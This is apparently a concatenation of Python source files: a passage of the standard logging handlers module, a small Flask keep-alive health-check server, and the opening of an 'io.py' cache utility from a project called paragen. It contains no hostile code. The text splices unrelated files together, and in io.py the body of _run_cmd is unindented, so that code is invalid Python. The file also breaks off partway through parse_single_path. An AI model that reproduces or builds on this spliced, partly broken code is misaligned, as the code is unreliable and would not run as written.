        dfn = self.rotation_filename(self.baseFilename + "." +
                                     time.strftime(self.suffix, timeTuple))
        if os.path.exists(dfn):
            os.remove(dfn)
        self.rotate(self.baseFilename, dfn)
        if self.backupCount > 0:
            for s in self.getFilesToDelete():
                os.remove(s)
        if not self.delay:
            self.stream = self._open()
        newRolloverAt = self.computeRollover(currentTime)
        while newRolloverAt <= currentTime:
            newRolloverAt = newRolloverAt + self.interval
        # If DST changes and midnight or weekly rollover, adjust for this.
        if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
            dstAtRollover = time.localtime(newRolloverAt)[-1]
            if dstNow != dstAtRollover:
                if not dstNow:  # DST kicks in before next rollover, so we need to deduct an hour
                    addend = -3600
                else:           # DST bows out before next rollover, so we need to add an hour
                    addend = 3600
                newRolloverAt += addend
        self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
    """
    A handler for logging to a file, which watches the file
    to see if it has changed while in use. This can happen because of
    usage of programs such as newsyslog and logrotate which perform
    log file rotation. This handler, intended for use under Unix,
    watches the file to see if it has changed since the last emit.
    (A file has changed if its device or inode have changed.)
    If it has changed, the old file stream is closed, and the file
    opened to get a new stream.

    This handler is not appropriate for use under Windows, because
    under Windows open files cannot be moved or renamed - logging
    opens the files with exclusive locks - and so there is no need
    for such a handler. Furthermore, ST_INO is not supported under
    Windows; stat always returns zero for this value.

    This handler is based on a suggestion and patch by Chad J.
    Schroeder.
    """

    def __init__(self, filename, mode='a', encoding=None, delay=False):
        logging.FileHandler.__init__(self, filename, mode, encoding, delay)
        # Sentinel values until the stream has been stat'ed.
        self.dev, self.ino = -1, -1
        self._statstream()

    def _statstream(self):
        # Remember the device/inode of the currently open stream so that
        # reopenIfNeeded() can detect when the file is rotated away under us.
        if self.stream:
            sres = os.fstat(self.stream.fileno())
            self.dev, self.ino = sres[ST_DEV], sres[ST_INO]

    def reopenIfNeeded(self):
        """
        Reopen the log file if the underlying file has changed.

        Checks whether the file at our path still has the device/inode we
        opened; if not (or it no longer exists), close the old stream and
        reopen the path to get the current one.  Extracted from emit() so
        the check is reusable on its own (mirrors later stdlib versions).
        """
        # Reduce the chance of race conditions by stat'ing by path only
        # once and then fstat'ing our new fd if we opened a new log stream.
        # See issue #14632: Thanks to John Mulligan for the problem report
        # and patch.
        try:
            # stat the file by path, checking for existence
            sres = os.stat(self.baseFilename)
        except FileNotFoundError:
            sres = None
        # compare file system stat with that of our stream file handle
        if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
            if self.stream is not None:
                # we have an open file handle, clean it up
                self.stream.flush()
                self.stream.close()
                self.stream = None  # See Issue #21742: _open () might fail.
                # open a new file handle and get new stat info from that fd
                self.stream = self._open()
                self._statstream()

    def emit(self, record):
        """
        Emit a record.

        If the underlying file has changed, reopen it before delegating the
        actual output to FileHandler.emit().
        """
        self.reopenIfNeeded()
        logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
    """
    A handler class which writes logging records, in pickle format, to
    a streaming socket. The socket is kept open across logging calls.
    If the peer resets it, an attempt is made to reconnect on the next call.
    The pickle which is sent is that of the LogRecord's attribute dictionary
    (__dict__), so that the receiver does not need to have the logging module
    installed in order to process the logging event.

    To unpickle the record at the receiving end into a LogRecord, use the
    makeLogRecord function.
    """

    def __init__(self, host, port):
        """
        Initializes the handler with a specific host address and port.

        When the attribute *closeOnError* is set to True - if a socket error
        occurs, the socket is silently closed and then reopened on the next
        logging call.
        """
        logging.Handler.__init__(self)
        self.host = host
        self.port = port
        # port None means `host` is a Unix domain socket path.
        if port is None:
            self.address = host
        else:
            self.address = (host, port)
        self.sock = None
        self.closeOnError = False
        # retryTime is None until the first connect failure; afterwards it
        # holds the earliest time at which another attempt may be made.
        self.retryTime = None
        #
        # Exponential backoff parameters.
        #
        self.retryStart = 1.0
        self.retryMax = 30.0
        self.retryFactor = 2.0

    def makeSocket(self, timeout=1):
        """
        A factory method which allows subclasses to define the precise
        type of socket they want.
        """
        if self.port is not None:
            result = socket.create_connection(self.address, timeout=timeout)
        else:
            result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            result.settimeout(timeout)
            try:
                result.connect(self.address)
            except OSError:
                result.close()  # Issue 19182
                raise
        return result

    def createSocket(self):
        """
        Try to create a socket, using an exponential backoff with
        a max retry time. Thanks to Robert Olson for the original patch
        (SF #815911) which has been slightly refactored.
        """
        now = time.time()
        # Either retryTime is None, in which case this
        # is the first time back after a disconnect, or
        # we've waited long enough.
        if self.retryTime is None:
            attempt = True
        else:
            attempt = (now >= self.retryTime)
        if attempt:
            try:
                self.sock = self.makeSocket()
                self.retryTime = None  # next time, no delay before trying
            except OSError:
                # Creation failed, so set the retry time and return.
                if self.retryTime is None:
                    self.retryPeriod = self.retryStart
                else:
                    self.retryPeriod = self.retryPeriod * self.retryFactor
                    if self.retryPeriod > self.retryMax:
                        self.retryPeriod = self.retryMax
                self.retryTime = now + self.retryPeriod

    def send(self, s):
        """
        Send a pickled string to the socket.

        This function allows for partial sends which can happen when the
        network is busy.
        """
        if self.sock is None:
            self.createSocket()
        # self.sock can be None either because we haven't reached the retry
        # time yet, or because we have reached the retry time and retried,
        # but are still unable to connect.
        if self.sock:
            try:
                self.sock.sendall(s)
            except OSError:  # pragma: no cover
                self.sock.close()
                self.sock = None  # so we can call createSocket next time

    def makePickle(self, record):
        """
        Pickles the record in binary format with a length prefix, and
        returns it ready for transmission across the socket.
        """
        ei = record.exc_info
        if ei:
            # just to get traceback text into record.exc_text ...
            dummy = self.format(record)
        # See issue #14436: If msg or args are objects, they may not be
        # available on the receiving end. So we convert the msg % args
        # to a string, save it as msg and zap the args.
        d = dict(record.__dict__)
        d['msg'] = record.getMessage()
        d['args'] = None
        d['exc_info'] = None
        # Issue #25685: delete 'message' if present: redundant with 'msg'
        d.pop('message', None)
        # Protocol 1 keeps the payload readable by old receivers; the
        # 4-byte big-endian length prefix frames each record on the stream.
        s = pickle.dumps(d, 1)
        slen = struct.pack(">L", len(s))
        return slen + s

    def handleError(self, record):
        """
        Handle an error during logging.

        An error has occurred during logging. Most likely cause -
        connection lost. Close the socket so that we can retry on the
        next event.
        """
        if self.closeOnError and self.sock:
            self.sock.close()
            self.sock = None        # try to reconnect next time
        else:
            logging.Handler.handleError(self, record)

    def emit(self, record):
        """
        Emit a record.

        Pickles the record and writes it to the socket in binary format.
        If there is an error with the socket, silently drop the packet.
        If there was a problem with the socket, re-establishes the
        socket.
        """
        try:
            s = self.makePickle(record)
            self.send(s)
        except Exception:
            self.handleError(record)

    def close(self):
        """
        Closes the socket.
        """
        self.acquire()
        try:
            sock = self.sock
            if sock:
                self.sock = None
                sock.close()
            logging.Handler.close(self)
        finally:
            self.release()
class DatagramHandler(SocketHandler):
    """
    A handler class which writes logging records, in pickle format, to
    a datagram socket.  The pickle which is sent is that of the LogRecord's
    attribute dictionary (__dict__), so that the receiver does not need to
    have the logging module installed in order to process the logging event.

    To unpickle the record at the receiving end into a LogRecord, use the
    makeLogRecord function.
    """

    def __init__(self, host, port):
        """
        Initializes the handler with a specific host address and port.
        """
        SocketHandler.__init__(self, host, port)
        # A datagram socket has no connection to reset, so there is never
        # anything to close on error.
        self.closeOnError = False

    def makeSocket(self):
        """
        The factory method of SocketHandler is here overridden to create
        a UDP socket (SOCK_DGRAM).
        """
        family = socket.AF_UNIX if self.port is None else socket.AF_INET
        return socket.socket(family, socket.SOCK_DGRAM)

    def send(self, s):
        """
        Send a pickled string to a socket.

        Unlike the stream version, no partial-send handling is done here:
        UDP does not guarantee delivery and can deliver packets out of
        sequence anyway.
        """
        if self.sock is None:
            self.createSocket()
        self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
    """
    A handler class which sends formatted logging records to a syslog
    server. Based on Sam Rushing's syslog module:
    http://www.nightmare.com/squirl/python-ext/misc/syslog.py
    Contributed by Nicolas Untz (after which minor refactoring changes
    have been made).
    """

    # from <linux/sys/syslog.h>:
    # ======================================================================
    # priorities/facilities are encoded into a single 32-bit quantity, where
    # the bottom 3 bits are the priority (0-7) and the top 28 bits are the
    # facility (0-big number). Both the priorities and the facilities map
    # roughly one-to-one to strings in the syslogd(8) source code.  This
    # mapping is included in this file.
    #
    # priorities (these are ordered)

    LOG_EMERG     = 0       #  system is unusable
    LOG_ALERT     = 1       #  action must be taken immediately
    LOG_CRIT      = 2       #  critical conditions
    LOG_ERR       = 3       #  error conditions
    LOG_WARNING   = 4       #  warning conditions
    LOG_NOTICE    = 5       #  normal but significant condition
    LOG_INFO      = 6       #  informational
    LOG_DEBUG     = 7       #  debug-level messages

    #  facility codes
    LOG_KERN      = 0       #  kernel messages
    LOG_USER      = 1       #  random user-level messages
    LOG_MAIL      = 2       #  mail system
    LOG_DAEMON    = 3       #  system daemons
    LOG_AUTH      = 4       #  security/authorization messages
    LOG_SYSLOG    = 5       #  messages generated internally by syslogd
    LOG_LPR       = 6       #  line printer subsystem
    LOG_NEWS      = 7       #  network news subsystem
    LOG_UUCP      = 8       #  UUCP subsystem
    LOG_CRON      = 9       #  clock daemon
    LOG_AUTHPRIV  = 10      #  security/authorization messages (private)
    LOG_FTP       = 11      #  FTP daemon

    #  other codes through 15 reserved for system use
    LOG_LOCAL0    = 16      #  reserved for local use
    LOG_LOCAL1    = 17      #  reserved for local use
    LOG_LOCAL2    = 18      #  reserved for local use
    LOG_LOCAL3    = 19      #  reserved for local use
    LOG_LOCAL4    = 20      #  reserved for local use
    LOG_LOCAL5    = 21      #  reserved for local use
    LOG_LOCAL6    = 22      #  reserved for local use
    LOG_LOCAL7    = 23      #  reserved for local use

    # String aliases accepted by encodePriority() for the numeric levels
    # and facilities above.
    priority_names = {
        "alert":    LOG_ALERT,
        "crit":     LOG_CRIT,
        "critical": LOG_CRIT,
        "debug":    LOG_DEBUG,
        "emerg":    LOG_EMERG,
        "err":      LOG_ERR,
        "error":    LOG_ERR,        #  DEPRECATED
        "info":     LOG_INFO,
        "notice":   LOG_NOTICE,
        "panic":    LOG_EMERG,      #  DEPRECATED
        "warn":     LOG_WARNING,    #  DEPRECATED
        "warning":  LOG_WARNING,
        }

    facility_names = {
        "auth":     LOG_AUTH,
        "authpriv": LOG_AUTHPRIV,
        "cron":     LOG_CRON,
        "daemon":   LOG_DAEMON,
        "ftp":      LOG_FTP,
        "kern":     LOG_KERN,
        "lpr":      LOG_LPR,
        "mail":     LOG_MAIL,
        "news":     LOG_NEWS,
        "security": LOG_AUTH,       #  DEPRECATED
        "syslog":   LOG_SYSLOG,
        "user":     LOG_USER,
        "uucp":     LOG_UUCP,
        "local0":   LOG_LOCAL0,
        "local1":   LOG_LOCAL1,
        "local2":   LOG_LOCAL2,
        "local3":   LOG_LOCAL3,
        "local4":   LOG_LOCAL4,
        "local5":   LOG_LOCAL5,
        "local6":   LOG_LOCAL6,
        "local7":   LOG_LOCAL7,
        }

    # The map below appears to be trivially lowercasing the key. However,
    # there's more to it than meets the eye - in some locales, lowercasing
    # gives unexpected results. See SF #1524081: in the Turkish locale,
    # "INFO".lower() != "info"
    priority_map = {
        "DEBUG" : "debug",
        "INFO" : "info",
        "WARNING" : "warning",
        "ERROR" : "error",
        "CRITICAL" : "critical"
    }

    def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
                 facility=LOG_USER, socktype=None):
        """
        Initialize a handler.

        If address is specified as a string, a UNIX socket is used. To log to a
        local syslogd, "SysLogHandler(address="/dev/log")" can be used.
        If facility is not specified, LOG_USER is used. If socktype is
        specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
        socket type will be used. For Unix sockets, you can also specify a
        socktype of None, in which case socket.SOCK_DGRAM will be used, falling
        back to socket.SOCK_STREAM.
        """
        logging.Handler.__init__(self)

        self.address = address
        self.facility = facility
        self.socktype = socktype

        if isinstance(address, str):
            self.unixsocket = True
            self._connect_unixsocket(address)
        else:
            self.unixsocket = False
            if socktype is None:
                socktype = socket.SOCK_DGRAM
            self.socket = socket.socket(socket.AF_INET, socktype)
            if socktype == socket.SOCK_STREAM:
                self.socket.connect(address)
            self.socktype = socktype
        self.formatter = None

    def _connect_unixsocket(self, address):
        # Try the requested (or default datagram) socket type first; when the
        # caller did not pin a type, fall back to a stream socket, as some
        # syslog daemons only listen on SOCK_STREAM.
        use_socktype = self.socktype
        if use_socktype is None:
            use_socktype = socket.SOCK_DGRAM
        self.socket = socket.socket(socket.AF_UNIX, use_socktype)
        try:
            self.socket.connect(address)
            # it worked, so set self.socktype to the used type
            self.socktype = use_socktype
        except OSError:
            self.socket.close()
            if self.socktype is not None:
                # user didn't specify falling back, so fail
                raise
            use_socktype = socket.SOCK_STREAM
            self.socket = socket.socket(socket.AF_UNIX, use_socktype)
            try:
                self.socket.connect(address)
                # it worked, so set self.socktype to the used type
                self.socktype = use_socktype
            except OSError:
                self.socket.close()
                raise

    def encodePriority(self, facility, priority):
        """
        Encode the facility and priority. You can pass in strings or
        integers - if strings are passed, the facility_names and
        priority_names mapping dictionaries are used to convert them to
        integers.
        """
        if isinstance(facility, str):
            facility = self.facility_names[facility]
        if isinstance(priority, str):
            priority = self.priority_names[priority]
        # Bottom 3 bits: priority; remaining bits: facility.
        return (facility << 3) | priority

    def close(self):
        """
        Closes the socket.
        """
        self.acquire()
        try:
            self.socket.close()
            logging.Handler.close(self)
        finally:
            self.release()

    def mapPriority(self, levelName):
        """
        Map a logging level name to a key in the priority_names map.
        This is useful in two scenarios: when custom levels are being
        used, and in the case where you can't do a straightforward
        mapping by lowercasing the logging level name because of locale-
        specific issues (see SF #1524081).
        """
        return self.priority_map.get(levelName, "warning")

    ident = ''          # prepended to all messages
    append_nul = True   # some old syslog daemons expect a NUL terminator

    def emit(self, record):
        """
        Emit a record.

        The record is formatted, and then sent to the syslog server. If
        exception information is present, it is NOT sent to the server.
        """
        try:
            msg = self.format(record)
            if self.ident:
                msg = self.ident + msg
            if self.append_nul:
                msg += '\000'

            # We need to convert record level to lowercase, maybe this will
            # change in the future.
            prio = '<%d>' % self.encodePriority(self.facility,
                                                self.mapPriority(record.levelname))
            prio = prio.encode('utf-8')
            # Message is a string. Convert to bytes as required by RFC 5424
            msg = msg.encode('utf-8')
            msg = prio + msg
            if self.unixsocket:
                try:
                    self.socket.send(msg)
                except OSError:
                    # Connection went away (e.g. syslogd restarted); reconnect
                    # once and resend.
                    self.socket.close()
                    self._connect_unixsocket(self.address)
                    self.socket.send(msg)
            elif self.socktype == socket.SOCK_DGRAM:
                self.socket.sendto(msg, self.address)
            else:
                self.socket.sendall(msg)
        except Exception:
            self.handleError(record)
class SMTPHandler(logging.Handler):
    """
    A handler class which sends an SMTP email for each logging event.
    """
    def __init__(self, mailhost, fromaddr, toaddrs, subject,
                 credentials=None, secure=None, timeout=5.0):
        """
        Initialize the handler.

        Initialize the instance with the from and to addresses and subject
        line of the email. To specify a non-standard SMTP port, use the
        (host, port) tuple format for the mailhost argument. To specify
        authentication credentials, supply a (username, password) tuple
        for the credentials argument. To specify the use of a secure
        protocol (TLS), pass in a tuple for the secure argument. This will
        only be used when authentication credentials are supplied. The tuple
        will be either an empty tuple, or a single-value tuple with the name
        of a keyfile, or a 2-value tuple with the names of the keyfile and
        certificate file. (This tuple is passed to the `starttls` method).
        A timeout in seconds can be specified for the SMTP connection (the
        default is 5.0 seconds).
        """
        logging.Handler.__init__(self)
        if isinstance(mailhost, (list, tuple)):
            self.mailhost, self.mailport = mailhost
        else:
            self.mailhost, self.mailport = mailhost, None
        if isinstance(credentials, (list, tuple)):
            self.username, self.password = credentials
        else:
            # self.password is deliberately left unset in this branch:
            # emit() only reads it after checking `if self.username:`.
            self.username = None
        self.fromaddr = fromaddr
        if isinstance(toaddrs, str):
            toaddrs = [toaddrs]
        self.toaddrs = toaddrs
        self.subject = subject
        self.secure = secure
        self.timeout = timeout
    def getSubject(self, record):
        """
        Determine the subject for the email.

        If you want to specify a subject line which is record-dependent,
        override this method.
        """
        return self.subject
    def emit(self, record):
        """
        Emit a record.

        Format the record and send it to the specified addressees.
        """
        try:
            # Imported lazily so the module loads even where these are costly.
            import smtplib
            from email.message import EmailMessage
            import email.utils
            port = self.mailport
            if not port:
                port = smtplib.SMTP_PORT
            smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
            msg = EmailMessage()
            msg['From'] = self.fromaddr
            msg['To'] = ','.join(self.toaddrs)
            msg['Subject'] = self.getSubject(record)
            msg['Date'] = email.utils.localtime()
            msg.set_content(self.format(record))
            if self.username:
                if self.secure is not None:
                    # Upgrade the connection to TLS before authenticating.
                    smtp.ehlo()
                    smtp.starttls(*self.secure)
                    smtp.ehlo()
                smtp.login(self.username, self.password)
            smtp.send_message(msg)
            smtp.quit()
        except Exception:
            self.handleError(record)
class NTEventLogHandler(logging.Handler):
    """
    A handler class which sends events to the NT Event Log. Adds a
    registry entry for the specified application name. If no dllname is
    provided, win32service.pyd (which contains some basic message
    placeholders) is used. Note that use of these placeholders will make
    your event logs big, as the entire message source is held in the log.
    If you want slimmer logs, you have to pass in the name of your own DLL
    which contains the message definitions you want to use in the event log.
    """
    def __init__(self, appname, dllname=None, logtype="Application"):
        """
        Initialize the handler; requires the pywin32 extensions.
        If they are missing, the handler degrades to a no-op (_welu is None).
        """
        logging.Handler.__init__(self)
        try:
            import win32evtlogutil, win32evtlog
            self.appname = appname
            self._welu = win32evtlogutil
            if not dllname:
                # Default to win32service.pyd, which ships next to the
                # win32evtlogutil package.
                dllname = os.path.split(self._welu.__file__)
                dllname = os.path.split(dllname[0])
                dllname = os.path.join(dllname[0], r'win32service.pyd')
            self.dllname = dllname
            self.logtype = logtype
            self._welu.AddSourceToRegistry(appname, dllname, logtype)
            self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
            # Mapping from logging levels to NT event types.
            self.typemap = {
                logging.DEBUG   : win32evtlog.EVENTLOG_INFORMATION_TYPE,
                logging.INFO    : win32evtlog.EVENTLOG_INFORMATION_TYPE,
                logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
                logging.ERROR   : win32evtlog.EVENTLOG_ERROR_TYPE,
                logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
            }
        except ImportError:
            print("The Python Win32 extensions for NT (service, event "\
                  "logging) appear not to be available.")
            self._welu = None
    def getMessageID(self, record):
        """
        Return the message ID for the event record. If you are using your
        own messages, you could do this by having the msg passed to the
        logger being an ID rather than a formatting string. Then, in here,
        you could use a dictionary lookup to get the message ID. This
        version returns 1, which is the base message ID in win32service.pyd.
        """
        return 1
    def getEventCategory(self, record):
        """
        Return the event category for the record.

        Override this if you want to specify your own categories. This version
        returns 0.
        """
        return 0
    def getEventType(self, record):
        """
        Return the event type for the record.

        Override this if you want to specify your own types. This version does
        a mapping using the handler's typemap attribute, which is set up in
        __init__() to a dictionary which contains mappings for DEBUG, INFO,
        WARNING, ERROR and CRITICAL. If you are using your own levels you will
        either need to override this method or place a suitable dictionary in
        the handler's typemap attribute.
        """
        return self.typemap.get(record.levelno, self.deftype)
    def emit(self, record):
        """
        Emit a record.

        Determine the message ID, event category and event type. Then
        log the message in the NT event log.
        """
        if self._welu:
            try:
                id = self.getMessageID(record)
                cat = self.getEventCategory(record)
                type = self.getEventType(record)
                msg = self.format(record)
                self._welu.ReportEvent(self.appname, id, cat, type, [msg])
            except Exception:
                self.handleError(record)
    def close(self):
        """
        Clean up this handler.

        You can remove the application name from the registry as a
        source of event log entries. However, if you do this, you will
        not be able to see the events as you intended in the Event Log
        Viewer - it needs to be able to access the registry to get the
        DLL name.
        """
        #self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
        logging.Handler.close(self)
class HTTPHandler(logging.Handler):
    """
    A class which sends records to a Web server, using either GET or
    POST semantics.
    """
    def __init__(self, host, url, method="GET", secure=False, credentials=None,
                 context=None):
        """
        Initialize the instance with the host, the request URL, and the method
        ("GET" or "POST")
        """
        logging.Handler.__init__(self)
        method = method.upper()
        if method not in ["GET", "POST"]:
            raise ValueError("method must be GET or POST")
        if not secure and context is not None:
            raise ValueError("context parameter only makes sense "
                             "with secure=True")
        self.host = host
        self.url = url
        self.method = method
        self.secure = secure
        self.credentials = credentials
        self.context = context
    def mapLogRecord(self, record):
        """
        Default implementation of mapping the log record into a dict
        that is sent as the CGI data. Overwrite in your class.
        Contributed by Franz Glasner.
        """
        return record.__dict__
    def emit(self, record):
        """
        Emit a record.

        Send the record to the Web server as a percent-encoded dictionary
        """
        try:
            import http.client, urllib.parse
            host = self.host
            if self.secure:
                h = http.client.HTTPSConnection(host, context=self.context)
            else:
                h = http.client.HTTPConnection(host)
            url = self.url
            data = urllib.parse.urlencode(self.mapLogRecord(record))
            if self.method == "GET":
                # GET carries the record in the query string, appended with
                # '&' if the URL already has one, else '?'.
                if (url.find('?') >= 0):
                    sep = '&'
                else:
                    sep = '?'
                url = url + "%c%s" % (sep, data)
            h.putrequest(self.method, url)
            # support multiple hosts on one IP address...
            # need to strip optional :port from host, if present
            i = host.find(":")
            if i >= 0:
                host = host[:i]
            h.putheader("Host", host)
            if self.method == "POST":
                h.putheader("Content-type",
                            "application/x-www-form-urlencoded")
                h.putheader("Content-length", str(len(data)))
            if self.credentials:
                import base64
                # Basic auth header; credentials is a (user, password) tuple.
                s = ('%s:%s' % self.credentials).encode('utf-8')
                s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
                h.putheader('Authorization', s)
            h.endheaders()
            if self.method == "POST":
                h.send(data.encode('utf-8'))
            h.getresponse()    #can't do anything with the result
        except Exception:
            self.handleError(record)
class BufferingHandler(logging.Handler):
    """
    A handler that accumulates LogRecords in an in-memory buffer.

    After every record is appended, shouldFlush() is consulted; when it
    returns true, flush() is invoked. Subclasses customize behaviour by
    overriding shouldFlush() and/or flush().
    """
    def __init__(self, capacity):
        """Create the handler with room for ``capacity`` records."""
        logging.Handler.__init__(self)
        self.capacity = capacity
        self.buffer = []

    def shouldFlush(self, record):
        """
        Return true when the buffer has reached capacity.

        Override to implement a different flushing policy.
        """
        return len(self.buffer) >= self.capacity

    def emit(self, record):
        """
        Buffer the record, flushing when shouldFlush() says so.
        """
        self.buffer.append(record)
        if self.shouldFlush(record):
            self.flush()

    def flush(self):
        """
        Discard the buffered records.

        Override to implement useful flushing behaviour; this base
        version simply empties the buffer (under the handler lock).
        """
        self.acquire()
        try:
            self.buffer = []
        finally:
            self.release()

    def close(self):
        """
        Flush any remaining records, then close via the parent class.
        """
        try:
            self.flush()
        finally:
            logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
    """
    A BufferingHandler that periodically forwards its buffer to a target
    handler. Forwarding happens when the buffer fills up, or as soon as a
    record at ``flushLevel`` or above is seen.
    """
    def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
        """
        Create the handler.

        Without a target set here or later via setTarget(), flushing
        silently keeps (rather than delivers) the buffered records.
        """
        BufferingHandler.__init__(self, capacity)
        self.flushLevel = flushLevel
        self.target = target

    def shouldFlush(self, record):
        """
        Flush on a full buffer, or on any record at/above flushLevel.
        """
        if len(self.buffer) >= self.capacity:
            return True
        return record.levelno >= self.flushLevel

    def setTarget(self, target):
        """
        Set the handler that flush() forwards buffered records to.
        """
        self.target = target

    def flush(self):
        """
        Send every buffered record to the target (if any) and clear the
        buffer. Override for different behaviour.
        """
        self.acquire()
        try:
            if self.target:
                for buffered in self.buffer:
                    self.target.handle(buffered)
                self.buffer = []
        finally:
            self.release()

    def close(self):
        """
        Flush, drop the target reference, and close the buffer.
        """
        try:
            self.flush()
        finally:
            self.acquire()
            try:
                self.target = None
                BufferingHandler.close(self)
            finally:
                self.release()
class QueueHandler(logging.Handler):
    """
    A handler that forwards LogRecords to a queue.

    Typically paired with a multiprocessing Queue so a single process can
    centralise file logging for a multi-process application, avoiding
    write contention. New in Python 3.2, but copy-pastable into user code
    for earlier versions.
    """
    def __init__(self, queue):
        """Create the handler around the given queue."""
        logging.Handler.__init__(self)
        self.queue = queue

    def enqueue(self, record):
        """
        Put a record on the queue.

        Uses put_nowait; override for blocking puts, timeouts, or custom
        queue implementations.
        """
        self.queue.put_nowait(record)

    def prepare(self, record):
        """
        Make a record safe to enqueue (i.e. pickleable) and return it.

        Formatting merges the message with its args (and renders any
        traceback into exc_text), so msg/args/exc_info — which may not be
        pickleable — can be replaced/cleared in place. Override to send a
        dict, JSON, or a copy instead of mutating the original.
        """
        # format() populates record.message (and exc_text when there is
        # exception data); the rendered message then replaces msg + args.
        self.format(record)
        record.msg = record.message
        record.args = None
        record.exc_info = None
        return record

    def emit(self, record):
        """
        Prepare the record and enqueue it.
        """
        try:
            prepared = self.prepare(record)
            self.enqueue(prepared)
        except Exception:
            self.handleError(record)
if threading:
    class QueueListener(object):
        """
        This class implements an internal threaded listener which watches for
        LogRecords being added to a queue, removes them and passes them to a
        list of handlers for processing.
        """
        # Sentinel placed on the queue by enqueue_sentinel() to tell the
        # monitor thread to stop.
        _sentinel = None
        def __init__(self, queue, *handlers, respect_handler_level=False):
            """
            Initialise an instance with the specified queue and
            handlers.
            """
            self.queue = queue
            self.handlers = handlers
            self._thread = None
            self.respect_handler_level = respect_handler_level
        def dequeue(self, block):
            """
            Dequeue a record and return it, optionally blocking.

            The base implementation uses get. You may want to override this method
            if you want to use timeouts or work with custom queue implementations.
            """
            return self.queue.get(block)
        def start(self):
            """
            Start the listener.

            This starts up a background thread to monitor the queue for
            LogRecords to process.
            """
            self._thread = t = threading.Thread(target=self._monitor)
            t.daemon = True
            t.start()
        def prepare(self , record):
            """
            Prepare a record for handling.

            This method just returns the passed-in record. You may want to
            override this method if you need to do any custom marshalling or
            manipulation of the record before passing it to the handlers.
            """
            return record
        def handle(self, record):
            """
            Handle a record.

            This just loops through the handlers offering them the record
            to handle.
            """
            record = self.prepare(record)
            for handler in self.handlers:
                if not self.respect_handler_level:
                    process = True
                else:
                    # Honour each handler's own level threshold.
                    process = record.levelno >= handler.level
                if process:
                    handler.handle(record)
        def _monitor(self):
            """
            Monitor the queue for records, and ask the handler
            to deal with them.

            This method runs on a separate, internal thread.
            The thread will terminate if it sees a sentinel object in the queue.
            """
            q = self.queue
            has_task_done = hasattr(q, 'task_done')
            while True:
                try:
                    record = self.dequeue(True)
                    if record is self._sentinel:
                        break
                    self.handle(record)
                    if has_task_done:
                        q.task_done()
                # NOTE: relies on the module-level `import queue` for
                # queue.Empty; with a blocking get this fires only for
                # custom dequeue() overrides that time out.
                except queue.Empty:
                    break
        def enqueue_sentinel(self):
            """
            This is used to enqueue the sentinel record.

            The base implementation uses put_nowait. You may want to override this
            method if you want to use timeouts or work with custom queue
            implementations.
            """
            self.queue.put_nowait(self._sentinel)
        def stop(self):
            """
            Stop the listener.

            This asks the thread to terminate, and then waits for it to do so.
            Note that if you don't call this before your application exits, there
            may be some records still left on the queue, which won't be processed.
            """
            self.enqueue_sentinel()
            self._thread.join()
            self._thread = None
|
keep_alive.py | from flask import Flask
from threading import Thread
# Minimal Flask app used purely as a liveness endpoint (e.g. for uptime pings).
app = Flask('')
port = 8080  # port the liveness server listens on
@app.route('/')
def home():
    """Health-check endpoint: respond to GET / with a static status string."""
    return "Server is currently running"
def run():
    """Run the Flask app, listening on all interfaces on the configured port."""
    app.run(host='0.0.0.0', port=port)
def keep_alive():
    """Start the liveness web server in a background thread and return."""
    # NOTE(review): the thread is non-daemon, so it keeps the process alive
    # after the main thread exits — confirm this is intentional.
    t = Thread(target=run)
    t.start()
io.py | from io import IOBase, TextIOBase
from multiprocessing import Process
import os
import sys
import re
import time
import json
import subprocess
import random
import logging
logger = logging.getLogger(__name__)
from paragen.utils.runtime import Environment
# Raw string: "\s" in a plain literal is an invalid escape sequence
# (DeprecationWarning today, a SyntaxError in future Python versions).
SPACE_NORMALIZER = re.compile(r"\s+")
# Cache directory for files fetched from remote storage; set by init_io().
TEMP_IO_SAVE_PATH = ""
def init_io():
    """
    Initialise the module-level cache directory TEMP_IO_SAVE_PATH and
    create it on disk if needed.

    Prefers ``$HOME/.cache/uio/``; when HOME is unset, os.getenv returns
    None and os.path.join raises, so we fall back to ``./.cache_uio/``.
    """
    global TEMP_IO_SAVE_PATH
    try:
        TEMP_IO_SAVE_PATH = os.path.join(os.getenv('HOME'), '.cache/uio/')
    except Exception:
        TEMP_IO_SAVE_PATH = os.path.join(os.getcwd(), '.cache_uio/')
    if not os.path.exists(TEMP_IO_SAVE_PATH):
        os.makedirs(TEMP_IO_SAVE_PATH, exist_ok=True)
def clear_cache():
    """
    Best-effort removal of cached files under TEMP_IO_SAVE_PATH that no
    process currently holds open (according to ``lsof +d``).
    """
    global TEMP_IO_SAVE_PATH
    output = subprocess.run('lsof +d {}'.format(TEMP_IO_SAVE_PATH).split(), capture_output=True)
    # NOTE(review): each element here is a full lsof output line, not just a
    # path, so the membership test below may be too permissive — verify.
    occupied = str(output.stdout, encoding='utf8').split('\n')
    occupied = set([filepath for filepath in occupied if filepath])
    for name in os.listdir(TEMP_IO_SAVE_PATH):
        filename = os.path.join(TEMP_IO_SAVE_PATH, name)
        if filename not in occupied:
            try:
                os.remove(filename)
            except OSError:
                # Fix: was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit. Deletion stays best-effort.
                pass
init_io()  # ensure the cache directory exists as soon as the module is imported
def _run_cmd(args_list):
"""
run linux commands
"""
proc = subprocess.Popen(args_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
s_output, s_err = proc.communicate()
s_return = proc.returncode
return s_return, s_output, s_err
def parse_single_path(path):
    """
    Expand one path spec into a shuffled list of concrete file paths.

    A trailing ``*`` matches files in the parent directory whose names
    start with the given prefix; a directory expands to its files; any
    other path is returned as-is.

    Args:
        path: input path

    Returns:
        - list of file paths (shuffled in place)
    """
    def _files_in(directory):
